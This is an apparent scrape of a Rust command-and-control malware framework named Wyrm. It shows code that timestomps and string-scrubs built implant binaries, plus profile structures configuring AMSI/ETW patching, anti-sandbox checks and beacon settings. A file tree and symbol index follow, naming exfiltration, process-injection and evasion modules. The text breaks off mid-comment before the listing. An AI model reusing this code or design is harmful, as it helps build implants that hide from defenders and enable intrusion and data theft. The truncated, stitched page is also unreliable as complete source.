    const INITIAL_LEN: usize = 2000;
    let mut buf = Vec::with_capacity(INITIAL_LEN);
    unsafe { buf.set_len(INITIAL_LEN) };

    if let Err(e) = file.read_exact(&mut buf).await {
        return Err(PeScrubError::FileRead(e.to_string()));
    }

    let p_dos_header = buf.as_ptr() as *const IMAGE_DOS_HEADER;

    // SAFETY: We know this is not null
    let dos_header = unsafe { &*(p_dos_header) };
    if dos_header.e_magic != 0x5a4d {
        return Err(PeScrubError::MagicBytesMZ(dos_header.e_magic));
    }

    // check that we have the NT header in the buffer, if not, then just read the whole file,
    // but this should not happen
    if dos_header.e_lfanew as usize + size_of::<IMAGE_NT_HEADERS64>() > buf.len() {
        return Err(PeScrubError::BuffTooSmall);
    }

    //
    // Create the datetime as epoch then write to the original file at the correct offset (e_lfanew + 8 bytes)
    //
    let timestamp = str_to_epoch(dt_str)?;

    const OFFSET_TIMESTAMP: u64 = 8;
    file.seek(SeekFrom::Start(
        dos_header.e_lfanew as u64 + OFFSET_TIMESTAMP,
    ))
    .await
    .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    file.write_all(&timestamp.to_le_bytes())
        .await
        .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    file.flush()
        .await
        .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    Ok(())
}

fn str_to_epoch(dt_str: &str) -> Result<u32, PeScrubError> {
    let datetime = match NaiveDateTime::parse_from_str(dt_str, "%d/%m/%Y %H:%M:%S") {
        Ok(d) => d,
        Err(_) => return Err(PeScrubError::DTMismatch),
    };

    Ok(datetime.and_utc().timestamp() as u32)
}

/// Scrubs all occurrences of `needle` from the file at `path`, overwriting it in place.
///
/// If `replacement`` is:
/// - `None`: the bytes are zeroed out.
/// - `Some(r)`: the bytes are zeroed and then the first `r.len()` bytes are replaced with `r`.
///
/// # Error
/// Function returns a [`PeScrubError`] if an error occurs.
pub async fn scrub_strings(
    build_path: &Path,
    needle: &[u8],
    replacement: Option<&[u8]>,
) -> Result<(), PeScrubError> {
    let mut file = OpenOptions::new()
        .read(true)
        .write(true)
        .open(build_path)
        .await
        .map_err(|e| PeScrubError::FileOpen(e.to_string()))?;

    let file_len = file.metadata().await.unwrap().len() as usize;

    let mut buf = Vec::with_capacity(file_len);
    unsafe { buf.set_len(file_len) };

    if let Err(e) = file.read_exact(&mut buf).await {
        return Err(PeScrubError::FileRead(e.to_string()));
    }

    const CIRCUIT_BREAKER_MAX: u32 = 10000;
    let mut i = 0;

    while let Some(pos) = buf.windows(needle.len()).position(|w| w.eq(needle)) {
        let end = pos + needle.len();
        if let Some(replacement) = replacement {
            if replacement.len() > needle.len() {
                let s = String::from_utf8_lossy(needle);
                log_error_async(&format!(
                    "Could not scrub string {s}, replacement was longer than input."
                ))
                .await;

                continue;
            }

            buf[pos..end].fill(0);

            let end_replacement = pos + replacement.len();
            buf[pos..end_replacement].copy_from_slice(replacement);
        } else {
            buf[pos..end].fill(0);
        }

        i += 1;
        if i >= CIRCUIT_BREAKER_MAX {
            //
            // We hit the circuit breaker for the loop - write what changes were made to the binary,
            // and return an error, discontinuing the loop.
            //
            return commit_files(&mut file, &mut buf).await;
        }
    }

    commit_files(&mut file, &mut buf).await
}

async fn commit_files(file: &mut File, buf: &mut Vec<u8>) -> Result<(), PeScrubError> {
    file.seek(SeekFrom::Start(0))
        .await
        .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    file.write_all(&buf)
        .await
        .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    file.flush()
        .await
        .map_err(|e| PeScrubError::FileWriteError(e.to_string()))?;

    Ok(())
}


================================================
FILE: c2/src/pe_utils/types.rs
================================================
#[repr(C)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_FILE_HEADER {
    pub Machine: IMAGE_FILE_MACHINE,
    pub NumberOfSections: u16,
    pub TimeDateStamp: u32,
    pub PointerToSymbolTable: u32,
    pub NumberOfSymbols: u32,
    pub SizeOfOptionalHeader: u16,
    pub Characteristics: IMAGE_FILE_CHARACTERISTICS,
}

#[repr(transparent)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_FILE_MACHINE(pub u16);

#[repr(transparent)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_FILE_CHARACTERISTICS(pub u16);

#[repr(C)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_NT_HEADERS64 {
    pub Signature: u32,
    pub FileHeader: IMAGE_FILE_HEADER,
    pub OptionalHeader: IMAGE_OPTIONAL_HEADER64,
}

#[repr(C, packed(2))]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_DOS_HEADER {
    pub e_magic: u16,
    pub e_cblp: u16,
    pub e_cp: u16,
    pub e_crlc: u16,
    pub e_cparhdr: u16,
    pub e_minalloc: u16,
    pub e_maxalloc: u16,
    pub e_ss: u16,
    pub e_sp: u16,
    pub e_csum: u16,
    pub e_ip: u16,
    pub e_cs: u16,
    pub e_lfarlc: u16,
    pub e_ovno: u16,
    pub e_res: [u16; 4],
    pub e_oemid: u16,
    pub e_oeminfo: u16,
    pub e_res2: [u16; 10],
    pub e_lfanew: i32,
}

#[repr(C, packed(4))]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_OPTIONAL_HEADER64 {
    pub Magic: IMAGE_OPTIONAL_HEADER_MAGIC,
    pub MajorLinkerVersion: u8,
    pub MinorLinkerVersion: u8,
    pub SizeOfCode: u32,
    pub SizeOfInitializedData: u32,
    pub SizeOfUninitializedData: u32,
    pub AddressOfEntryPoint: u32,
    pub BaseOfCode: u32,
    pub ImageBase: u64,
    pub SectionAlignment: u32,
    pub FileAlignment: u32,
    pub MajorOperatingSystemVersion: u16,
    pub MinorOperatingSystemVersion: u16,
    pub MajorImageVersion: u16,
    pub MinorImageVersion: u16,
    pub MajorSubsystemVersion: u16,
    pub MinorSubsystemVersion: u16,
    pub Win32VersionValue: u32,
    pub SizeOfImage: u32,
    pub SizeOfHeaders: u32,
    pub CheckSum: u32,
    pub Subsystem: IMAGE_SUBSYSTEM,
    pub DllCharacteristics: IMAGE_DLL_CHARACTERISTICS,
    pub SizeOfStackReserve: u64,
    pub SizeOfStackCommit: u64,
    pub SizeOfHeapReserve: u64,
    pub SizeOfHeapCommit: u64,
    pub LoaderFlags: u32,
    pub NumberOfRvaAndSizes: u32,
    pub DataDirectory: [IMAGE_DATA_DIRECTORY; 16],
}

#[repr(transparent)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_OPTIONAL_HEADER_MAGIC(pub u16);

#[repr(transparent)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_DLL_CHARACTERISTICS(pub u16);

#[repr(transparent)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_SUBSYSTEM(pub u16);

#[repr(C)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_DATA_DIRECTORY {
    pub VirtualAddress: u32,
    pub Size: u32,
}

#[repr(C)]
#[allow(non_snake_case, non_camel_case_types)]
pub struct IMAGE_EXPORT_DIRECTORY {
    pub Characteristics: u32,
    pub TimeDateStamp: u32,
    pub MajorVersion: u16,
    pub MinorVersion: u16,
    pub Name: u32,
    pub Base: u32,
    pub NumberOfFunctions: u32,
    pub NumberOfNames: u32,
    pub AddressOfFunctions: u32,
    pub AddressOfNames: u32,
    pub AddressOfNameOrdinals: u32,
}


================================================
FILE: c2/src/profiles.rs
================================================
use std::{
    collections::{BTreeMap, HashSet},
    path::{Path, PathBuf},
};

use serde::Deserialize;
use shared::tasks::{Exports, NewAgentStaging, StageType, StringStomp, WyrmResult};
use tokio::io;

use crate::{WOFS_PATH, logging::log_error};

#[derive(Deserialize, Debug, Default, Clone)]
pub struct Profile {
    pub server: Server,
    pub implants: BTreeMap<String, Implant>,
}

#[derive(Deserialize, Debug, Default, Clone)]
pub struct Server {
    pub token: String,
}

#[derive(Deserialize, Debug, Default, Clone)]
pub struct Network {
    pub address: String,
    pub uri: Vec<String>,
    pub port: u16,
    pub token: Option<String>,
    pub sleep: Option<u64>,
    pub useragent: Option<String>,
    pub jitter: Option<u64>,
}

#[derive(Deserialize, Debug, Default, Clone)]
pub struct Implant {
    pub anti_sandbox: Option<AntiSandbox>,
    pub debug: Option<bool>,
    svc_name: String,
    pub network: Network,
    pub evasion: Evasion,
    pub exports: Exports,
    pub string_stomp: Option<StringStomp>,
    pub mutex: Option<String>,
    pub wofs: Option<Vec<String>>,
}

#[derive(Deserialize, Debug, Default, Clone)]
pub struct AntiSandbox {
    pub trig: Option<bool>,
    pub ram: Option<bool>,
}

#[derive(Deserialize, Debug, Default, Clone)]
pub struct Evasion {
    pub patch_etw: Option<bool>,
    pub patch_amsi: Option<bool>,
    pub timestomp: Option<String>,
    pub spawn_as: Option<String>,
}

impl Profile {
    /// Constructs a [`shared::tasks::NewAgentStaging`] from the profile.
    ///
    /// # Args
    /// - `listener_profile_name`: The name in the profile for which listener is selected
    /// - `implant_profile_name`: The name in the profile for which implant profile is selected
    /// - `stage_type`: The [`shared::tasks::StageType`] of binary to build
    pub fn as_staged_agent(
        &self,
        implant_profile_name: &str,
        stage_type: StageType,
    ) -> WyrmResult<NewAgentStaging> {
        //
        // Essentially here we are going to validate the input; and reconstruct the data assuming it is correct.
        // In the event of an error, we want to return a WyrmResult::Err to indicate there was some form of failure.
        //

        let implant = match self.implants.get(implant_profile_name) {
            Some(i) => i,
            None => {
                return WyrmResult::Err(format!(
                    "Could not find implant profile {implant_profile_name}"
                ));
            }
        };

        let build_debug = implant.debug.unwrap_or_default();
        let patch_etw = implant.evasion.patch_etw.unwrap_or_default();
        let patch_amsi = implant.evasion.patch_amsi.unwrap_or_default();

        // Unwrap a sleep time from 
Download .txt
gitextract_j_8agxu3/

├── .dockerignore
├── .gitignore
├── .vscode/
│   └── settings.json
├── CONTRIBUITIONS.md
├── Cargo.toml
├── LICENCE
├── Milestones.md
├── RELEASE_NOTES.md
├── Readme.md
├── c2/
│   ├── Cargo.toml
│   ├── Dockerfile
│   ├── Readme.md
│   ├── migrations/
│   │   ├── 20250614124105_agent_table.sql
│   │   ├── 20250614124140_add_sleep.sql
│   │   ├── 20250614132037_tasks.sql
│   │   ├── 20250615070633_flesh_table.sql
│   │   ├── 20250615072852_add_col_back_tasks.sql
│   │   ├── 20250615085223_add_uid.sql
│   │   ├── 20250615085245_add_uid.sql
│   │   ├── 20250615211204_rm_col_from_tasks.sql
│   │   ├── 20250616171233_ch_col.sql
│   │   ├── 20250619055731_results_table.sql
│   │   ├── 20250621175632_add_time.sql
│   │   ├── 20250621180355_add_time.sql
│   │   ├── 20250622075242_agent_staging.sql
│   │   ├── 20250622080004_protect_staging.sql
│   │   ├── 20250622080748_remove_constraint.sql
│   │   ├── 20250622083052_add_col_staging.sql
│   │   ├── 20250622094131_add_col_staging_again.sql
│   │   ├── 20250622094232_del_col_agent.sql
│   │   ├── 20250622122051_protect_pe_name.sql
│   │   ├── 20250622130349_port_to_agent_staging.sql
│   │   ├── 20250622154423_operator_table.sql
│   │   ├── 20250622161952_db_add_cstr.sql
│   │   ├── 20250624164511_col_for_toks.sql
│   │   ├── 20250627184526_default_env.sql
│   │   ├── 20250712164452_update_field_for_sleep.sql
│   │   ├── 20250712164815_update_field_for_prt.sql
│   │   ├── 20250712165040_update_field_for_prt_again.sql
│   │   ├── 20250719090503_rm_constraint_upload.sql
│   │   ├── 20250727101559_xor_payload.sql
│   │   ├── 20251025085314_update_time_completed_field.sql
│   │   ├── 20251026120715_change_dt_field.sql
│   │   ├── 20251026121136_change_dt_field_2.sql
│   │   ├── 20251026122000_time_comp_rm.sql
│   │   ├── 20251026144632_add_agent_id_to_ct.sql
│   │   ├── 20251119185937_add_pulled_col.sql
│   │   ├── 20251127184944_download_col.sql
│   │   ├── 20251127193415_make_bigint.sql
│   │   ├── 20251207091938_beacon_console_line.sql
│   │   ├── 20251207092341_testagent.sql
│   │   ├── 20251215120000_completed_tasks_pending_idx.sql
│   │   └── 20251215123000_tasks_fetched_default.sql
│   └── src/
│       ├── admin_task_dispatch/
│       │   ├── dispatch_table.rs
│       │   ├── execute.rs
│       │   ├── implant_builder.rs
│       │   └── mod.rs
│       ├── agents.rs
│       ├── api/
│       │   ├── admin_routes.rs
│       │   ├── agent_get.rs
│       │   ├── agent_post.rs
│       │   └── mod.rs
│       ├── app_state.rs
│       ├── db.rs
│       ├── exfil.rs
│       ├── logging.rs
│       ├── main.rs
│       ├── middleware.rs
│       ├── net.rs
│       ├── pe_utils/
│       │   ├── mod.rs
│       │   └── types.rs
│       └── profiles.rs
├── client/
│   ├── Caddyfile
│   ├── Cargo.toml
│   ├── Dockerfile
│   ├── index.html
│   ├── src/
│   │   ├── controller/
│   │   │   ├── build_profiles.rs
│   │   │   ├── dashboard.rs
│   │   │   └── mod.rs
│   │   ├── main.rs
│   │   ├── models/
│   │   │   ├── dashboard.rs
│   │   │   └── mod.rs
│   │   ├── net.rs
│   │   ├── pages/
│   │   │   ├── build_profiles.rs
│   │   │   ├── dashboard.rs
│   │   │   ├── file_upload.rs
│   │   │   ├── logged_in_headers.rs
│   │   │   ├── login.rs
│   │   │   ├── logout.rs
│   │   │   ├── mod.rs
│   │   │   └── staged_resources.rs
│   │   └── tasks/
│   │       ├── mod.rs
│   │       ├── task_dispatch.rs
│   │       ├── task_impl.rs
│   │       └── utils.rs
│   └── static/
│       ├── main_styles.css
│       └── styles.css
├── docker-compose.yml
├── implant/
│   ├── .cargo/
│   │   └── config.toml
│   ├── Cargo.toml
│   ├── Readme.md
│   ├── build.rs
│   ├── rust-toolchain.toml
│   ├── set_dbg_env.ps1
│   └── src/
│       ├── anti_sandbox/
│       │   ├── memory.rs
│       │   ├── mod.rs
│       │   └── trig.rs
│       ├── comms.rs
│       ├── entry.rs
│       ├── evasion/
│       │   ├── amsi.rs
│       │   ├── etw.rs
│       │   ├── mod.rs
│       │   └── veh.rs
│       ├── execute/
│       │   ├── dotnet.rs
│       │   ├── ffi.rs
│       │   └── mod.rs
│       ├── lib.rs
│       ├── main.rs
│       ├── main_svc.rs
│       ├── native/
│       │   ├── Readme.md
│       │   ├── accounts.rs
│       │   ├── filesystem.rs
│       │   ├── mod.rs
│       │   ├── processes.rs
│       │   ├── registry.rs
│       │   └── shell.rs
│       ├── spawn_inject/
│       │   ├── early_cascade.rs
│       │   ├── injection.rs
│       │   └── mod.rs
│       ├── stubs/
│       │   ├── mod.rs
│       │   ├── rdi.rs
│       │   └── shim.rs
│       ├── utils/
│       │   ├── allocate.rs
│       │   ├── comptime.rs
│       │   ├── console.rs
│       │   ├── export_comptime.rs
│       │   ├── mod.rs
│       │   ├── pe_stomp.rs
│       │   ├── proxy.rs
│       │   ├── strings.rs
│       │   ├── svc_controls.rs
│       │   └── time_utils.rs
│       ├── wofs/
│       │   └── mod.rs
│       └── wyrm.rs
├── loader/
│   ├── .cargo/
│   │   └── config.toml
│   ├── Cargo.toml
│   ├── build.rs
│   └── src/
│       ├── export_comptime.rs
│       ├── injector.rs
│       ├── lib.rs
│       ├── main.rs
│       ├── main_svc.rs
│       └── utils.rs
├── nginx/
│   └── nginx.conf
├── resources/
│   ├── .$wyrm_staging.drawio.bkp
│   └── wyrm.excalidraw
├── shared/
│   ├── Cargo.toml
│   ├── readme.md
│   └── src/
│       ├── lib.rs
│       ├── net.rs
│       ├── stomped_structs.rs
│       ├── task_types.rs
│       └── tasks.rs
├── shared_c2_client/
│   ├── Cargo.toml
│   ├── readme.md
│   └── src/
│       └── lib.rs
├── shared_no_std/
│   ├── Cargo.toml
│   └── src/
│       ├── export_resolver.rs
│       ├── lib.rs
│       └── memory.rs
└── wofs_static/
    └── Readme.md
Download .txt
SYMBOL INDEX (627 symbols across 94 files)

FILE: c2/migrations/20250614124105_agent_table.sql
  type agents (line 2) | CREATE TABLE agents (

FILE: c2/migrations/20250614132037_tasks.sql
  type tasks (line 2) | CREATE TABLE tasks (

FILE: c2/migrations/20250615070633_flesh_table.sql
  type idx_tasks_incomplete (line 10) | CREATE INDEX idx_tasks_incomplete

FILE: c2/migrations/20250616171233_ch_col.sql
  type idx_tasks_incomplete (line 30) | CREATE INDEX idx_tasks_incomplete

FILE: c2/migrations/20250619055731_results_table.sql
  type completed_tasks (line 2) | CREATE TABLE completed_tasks (

FILE: c2/migrations/20250622075242_agent_staging.sql
  type agent_staging (line 2) | CREATE TABLE agent_staging (

FILE: c2/migrations/20250622154423_operator_table.sql
  type operators (line 2) | CREATE TABLE operators (

FILE: c2/migrations/20251215120000_completed_tasks_pending_idx.sql
  type idx_completed_tasks_agent_pending (line 2) | CREATE INDEX IF NOT EXISTS idx_completed_tasks_agent_pending

FILE: c2/src/admin_task_dispatch/dispatch_table.rs
  function admin_dispatch (line 21) | pub async fn admin_dispatch(

FILE: c2/src/admin_task_dispatch/execute.rs
  function dotex (line 15) | pub async fn dotex(
  type InternalName (line 41) | type InternalName = String;
  type SpawnInject (line 44) | pub enum SpawnInject {
  function spawn_inject_with_network_resource (line 50) | pub async fn spawn_inject_with_network_resource(

FILE: c2/src/admin_task_dispatch/implant_builder.rs
  constant FULLY_QUAL_PATH_TO_FILE_BUILD (line 28) | const FULLY_QUAL_PATH_TO_FILE_BUILD: &str = "/app/profiles/tmp";
  function build_all_bins (line 33) | pub async fn build_all_bins(
  function write_loader_to_tmp (line 114) | async fn write_loader_to_tmp(
  function compile_loader (line 215) | async fn compile_loader(
  function compile_agent (line 293) | pub async fn compile_agent(
  function post_process_pe_on_disk (line 421) | pub async fn post_process_pe_on_disk(dest: &Path, data: &NewAgentStaging...
  function write_implant_to_tmp_folder (line 473) | pub async fn write_implant_to_tmp_folder<'a>(
  function validate_extension (line 617) | fn validate_extension(name: &String, expected_type: StageType) -> String {
  function stage_new_agent_error_printer (line 657) | async fn stage_new_agent_error_printer(
  function stage_file_upload_from_users_disk (line 672) | pub async fn stage_file_upload_from_users_disk(

FILE: c2/src/admin_task_dispatch/mod.rs
  function remove_dir (line 24) | async fn remove_dir(save_path: impl AsRef<Path>) -> Result<(), String> {
  function remove_file (line 34) | async fn remove_file(file_path: impl AsRef<Path>) -> Result<(), String> {
  function list_agents (line 44) | async fn list_agents(state: State<Arc<AppState>>) -> Option<Value> {
  function task_agent (line 70) | async fn task_agent<T: Into<String>>(
  function task_agent_sleep (line 89) | async fn task_agent_sleep(time: i64, uid: String, state: State<Arc<AppSt...
  function pull_notifications_for_agent (line 108) | async fn pull_notifications_for_agent(uid: String, state: State<Arc<AppS...
  function show_server_time (line 141) | fn show_server_time() -> Option<Value> {
  function list_staged_resources (line 155) | async fn list_staged_resources(state: State<Arc<AppState>>) -> Option<Va...
  function delete_staged_resources (line 170) | async fn delete_staged_resources(
  function remove_agent_from_list (line 197) | async fn remove_agent_from_list(state: State<Arc<AppState>>, agent_name:...
  type StageError (line 205) | enum StageError {
  function add_api_endpoint_for_staged_resource (line 222) | async fn add_api_endpoint_for_staged_resource(
  function is_download_staging_url_error (line 241) | async fn is_download_staging_url_error(
  function drop_file_handler (line 278) | async fn drop_file_handler(
  function export_completed_tasks_to_json (line 321) | async fn export_completed_tasks_to_json(uid: String, state: State<Arc<Ap...

FILE: c2/src/agents.rs
  type Agent (line 12) | pub struct Agent {
    method from_first_run_data (line 23) | async fn from_first_run_data(
    method get_config_data (line 46) | pub fn get_config_data(&self) -> Vec<Task> {
  type AgentHandle (line 63) | type AgentHandle = Arc<RwLock<Agent>>;
  type AgentList (line 67) | pub struct AgentList {
    method default (line 73) | pub fn default() -> Self {
    method snapshot_handles (line 79) | async fn snapshot_handles(&self) -> Vec<AgentHandle> {
    method snapshot_agents (line 84) | pub async fn snapshot_agents(&self) -> Vec<Agent> {
    method mark_agents_stale (line 98) | pub async fn mark_agents_stale(&self) {
    method get_agent_and_tasks_by_header (line 121) | pub async fn get_agent_and_tasks_by_header(
    method contains_agent_by_id (line 225) | pub async fn contains_agent_by_id(&self, id: &str) -> bool {
    method remove_agent (line 230) | pub async fn remove_agent(&self, id: &str) {
  function extract_agent_id (line 241) | pub fn extract_agent_id(headers: &HeaderMap) -> Result<String, String> {
  function handle_kill_command (line 256) | pub async fn handle_kill_command(
  function calculate_max_time_till_stale (line 279) | async fn calculate_max_time_till_stale(sleep: u64) -> i64 {

FILE: c2/src/api/admin_routes.rs
  function handle_admin_commands_on_agent (line 28) | pub async fn handle_admin_commands_on_agent(
  function handle_admin_commands_without_agent (line 38) | pub async fn handle_admin_commands_without_agent(
  function poll_agent_notifications (line 47) | pub async fn poll_agent_notifications(
  function build_all_binaries_handler (line 66) | pub async fn build_all_binaries_handler(
  function admin_login (line 103) | pub async fn admin_login(
  function is_adm_logged_in (line 189) | pub async fn is_adm_logged_in() -> Response {
  function logout (line 193) | pub async fn logout() -> Response {
  function admin_upload (line 197) | pub async fn admin_upload(

FILE: c2/src/api/agent_get.rs
  function handle_agent_get (line 19) | pub async fn handle_agent_get(state: State<Arc<AppState>>, request: Requ...
  function handle_agent_get_with_path (line 42) | pub async fn handle_agent_get_with_path(

FILE: c2/src/api/agent_post.rs
  function agent_post_handler_with_path (line 25) | pub async fn agent_post_handler_with_path(
  function agent_post_handler (line 59) | pub async fn agent_post_handler(
  function handle_agent_post_standard (line 85) | async fn handle_agent_post_standard(
  function receive_exfil (line 208) | async fn receive_exfil(mut mp: Multipart) -> Result<StatusCode, StatusCo...
  function is_multipart (line 250) | fn is_multipart(headers: &HeaderMap) -> bool {

FILE: c2/src/app_state.rs
  type AppState (line 23) | pub struct AppState {
    method from (line 106) | pub async fn from(db_pool: Db, profile: Profile) -> Self {
    method track_sessions (line 135) | pub fn track_sessions(&self) {
    method create_session_key (line 150) | pub async fn create_session_key(&self) -> String {
    method has_session (line 172) | pub async fn has_session(&self, key: &str) -> bool {
    method remove_session (line 182) | pub async fn remove_session(&self, key: &str) {
  type DownloadEndpointData (line 36) | pub struct DownloadEndpointData {
    method new (line 43) | pub fn new(file_name: &str, internal_name: &str, xor_key: Option<u8>) ...
  type Endpoints (line 53) | pub struct Endpoints {
    method find_format_download_endpoint (line 67) | pub fn find_format_download_endpoint(&self, needle: &str) -> Option<St...
    method read_staged_file_by_file_name (line 78) | pub async fn read_staged_file_by_file_name(&self, needle: &str) -> Res...
  function detect_stale_agents (line 195) | pub async fn detect_stale_agents(state: Arc<AppState>) {

FILE: c2/src/db.rs
  constant MAX_DB_CONNECTIONS (line 20) | const MAX_DB_CONNECTIONS: u32 = 30;
  constant DB_ACQUIRE_TIMEOUT_SECS (line 21) | const DB_ACQUIRE_TIMEOUT_SECS: u64 = 3;
  constant DB_STATEMENT_TIMEOUT_MS (line 22) | const DB_STATEMENT_TIMEOUT_MS: u64 = 30_000;
  type Db (line 25) | pub struct Db {
    method new (line 31) | pub async fn new() -> Self {
    method get_agent_with_tasks_by_id (line 75) | pub async fn get_agent_with_tasks_by_id(
    method get_tasks_for_agent_by_uid (line 113) | pub async fn get_tasks_for_agent_by_uid(
    method insert_new_agent (line 171) | pub async fn insert_new_agent(
    method add_task_for_agent_by_id (line 198) | pub async fn add_task_for_agent_by_id(
    method update_agent_sleep_time (line 221) | pub async fn update_agent_sleep_time(
    method mark_task_completed (line 240) | pub async fn mark_task_completed(&self, task: &Task) -> Result<(), sql...
    method add_completed_task (line 257) | pub async fn add_completed_task(&self, task: &Task, agent_id: &str) ->...
    method agent_has_pending_notifications (line 279) | pub async fn agent_has_pending_notifications(&self, uid: &String) -> R...
    method pull_notifications_for_agent (line 306) | pub async fn pull_notifications_for_agent(
    method update_agent_checkin_time (line 349) | pub async fn update_agent_checkin_time(&self, agent: &mut Agent) -> Re...
    method add_staged_agent (line 385) | pub async fn add_staged_agent(&self, data: &NewAgentStaging) -> Result...
    method delete_staged_resource_by_uri (line 415) | pub async fn delete_staged_resource_by_uri(
    method get_agent_related_db_cfg (line 452) | pub async fn get_agent_related_db_cfg(
    method lookup_operator (line 509) | pub async fn lookup_operator(
    method add_operator (line 532) | pub async fn add_operator(
    method get_staged_agent_data (line 560) | pub async fn get_staged_agent_data(&self) -> Result<Vec<StagedResource...
    method get_agent_export_data (line 572) | pub async fn get_agent_export_data(&self, uid: &str) -> Result<Option<...
    method update_download_count (line 608) | pub async fn update_download_count(&self, staged_endpoint: &String) ->...

FILE: c2/src/exfil.rs
  function handle_exfiltrated_file (line 10) | pub async fn handle_exfiltrated_file(task: &mut Task) {
  function handle_exfiltrated_file_stream (line 92) | pub async fn handle_exfiltrated_file_stream(task: &mut Task) {

FILE: c2/src/logging.rs
  function log_download_accessed (line 8) | pub async fn log_download_accessed(uri: &str, addr: &str) {
  function log_page_accessed_no_auth (line 17) | pub async fn log_page_accessed_no_auth(uri: &str, addr: &str) {
  function log_page_accessed_auth (line 32) | pub async fn log_page_accessed_auth(uri: &str, addr: &str) {
  function log_admin_login_attempt (line 47) | pub async fn log_admin_login_attempt(username: &str, password: &str, ip:...
  function log_error (line 80) | pub fn log_error(message: &str) {
  function log_error_async (line 87) | pub async fn log_error_async(message: &str) {
  function log (line 98) | async fn log(path: &PathBuf, message: &str, addr: Option<&str>) {
  function log_sync (line 112) | fn log_sync(path: &PathBuf, message: &str, addr: Option<&str>) {
  function construct_msg (line 125) | fn construct_msg(ip: Option<&str>, message: &str) -> String {
  function print_success (line 166) | pub fn print_success(msg: impl Display) {
  function print_info (line 170) | pub fn print_info(msg: impl Display) {
  function print_failed (line 174) | pub fn print_failed(msg: impl Display) {

FILE: c2/src/main.rs
  constant NUM_GIGS (line 54) | const NUM_GIGS: usize = 100;
  constant MAX_POST_BODY_SZ (line 55) | const MAX_POST_BODY_SZ: usize = NUM_GIGS * 1024 * 1024 * 1024;
  constant AUTH_COOKIE_NAME (line 57) | const AUTH_COOKIE_NAME: &str = "session";
  constant COOKIE_TTL (line 58) | const COOKIE_TTL: Duration = Duration::from_hours(12);
  constant FILE_STORE_PATH (line 62) | const FILE_STORE_PATH: &str = "/data/staged_files";
  constant EXFIL_PATH (line 63) | const EXFIL_PATH: &str = "/data/loot";
  constant LOG_PATH (line 64) | const LOG_PATH: &str = "/data/logs";
  constant DB_EXPORT_PATH (line 65) | const DB_EXPORT_PATH: &str = "/data/exports";
  constant ACCESS_LOG (line 66) | const ACCESS_LOG: &str = "access.log";
  constant DOWNLOAD (line 67) | const DOWNLOAD: &str = "downloads.log";
  constant LOGIN_LOG (line 68) | const LOGIN_LOG: &str = "login.log";
  constant ERROR_LOG (line 69) | const ERROR_LOG: &str = "error.log";
  constant TOOLS_PATH (line 70) | const TOOLS_PATH: &str = "/tools";
  constant WOFS_PATH (line 71) | const WOFS_PATH: &str = "/wofs_static";
  function main (line 74) | async fn main() -> Result<(), Box<dyn std::error::Error>> {
  function construct_listener_addr (line 102) | fn construct_listener_addr() -> String {
  function init_server_state (line 112) | async fn init_server_state() -> Arc<AppState> {
  function build_routes (line 139) | fn build_routes(state: Arc<AppState>) -> Router {
  function ensure_dirs_and_files (line 226) | fn ensure_dirs_and_files() {
  function handle_panic (line 240) | fn handle_panic(err: Box<dyn Any + Send + 'static>) -> Response<Full<Byt...

FILE: c2/src/middleware.rs
  constant BCRYPT_HASH_BYTES (line 20) | const BCRYPT_HASH_BYTES: usize = 24;
  constant BCRYPT_COST (line 21) | const BCRYPT_COST: u32 = 12;
  constant SALT_BYTES (line 22) | const SALT_BYTES: usize = 16;
  constant LOCK_WAIT_WARN_MS (line 23) | const LOCK_WAIT_WARN_MS: u128 = 500;
  function authenticate_admin (line 31) | pub async fn authenticate_admin(
  function verify_password (line 56) | pub async fn verify_password(password: &str, password_hash: &str, salt: ...
  function create_new_operator (line 83) | pub async fn create_new_operator(username: &str, password: &str, state: ...
  function authenticate_agent_by_header_token (line 123) | pub async fn authenticate_agent_by_header_token(
  function logout_middleware (line 206) | pub async fn logout_middleware(

FILE: c2/src/net.rs
  function serialise_tasks_for_agent (line 27) | pub async fn serialise_tasks_for_agent(tasks: Option<Vec<Task>>) -> Vec<...
  function prepare_response_packet (line 54) | async fn prepare_response_packet(task: Task) -> Vec<u8> {
  function from_task_id_bytes (line 80) | fn from_task_id_bytes(id: i32) -> Vec<u16> {
  function serve_file (line 90) | pub async fn serve_file(filename: &String, xor_key: Option<u8>) -> Respo...

FILE: c2/src/pe_utils/mod.rs
  type PeScrubError (line 18) | pub enum PeScrubError {
  function timestomp_binary_compile_date (line 46) | pub async fn timestomp_binary_compile_date(
  function str_to_epoch (line 106) | fn str_to_epoch(dt_str: &str) -> Result<u32, PeScrubError> {
  function scrub_strings (line 123) | pub async fn scrub_strings(
  function commit_files (line 181) | async fn commit_files(file: &mut File, buf: &mut Vec<u8>) -> Result<(), ...

FILE: c2/src/pe_utils/types.rs
  type IMAGE_FILE_HEADER (line 3) | pub struct IMAGE_FILE_HEADER {
  type IMAGE_FILE_MACHINE (line 15) | pub struct IMAGE_FILE_MACHINE(pub u16);
  type IMAGE_FILE_CHARACTERISTICS (line 19) | pub struct IMAGE_FILE_CHARACTERISTICS(pub u16);
  type IMAGE_NT_HEADERS64 (line 23) | pub struct IMAGE_NT_HEADERS64 {
  type IMAGE_DOS_HEADER (line 31) | pub struct IMAGE_DOS_HEADER {
  type IMAGE_OPTIONAL_HEADER64 (line 55) | pub struct IMAGE_OPTIONAL_HEADER64 {
  type IMAGE_OPTIONAL_HEADER_MAGIC (line 90) | pub struct IMAGE_OPTIONAL_HEADER_MAGIC(pub u16);
  type IMAGE_DLL_CHARACTERISTICS (line 94) | pub struct IMAGE_DLL_CHARACTERISTICS(pub u16);
  type IMAGE_SUBSYSTEM (line 98) | pub struct IMAGE_SUBSYSTEM(pub u16);
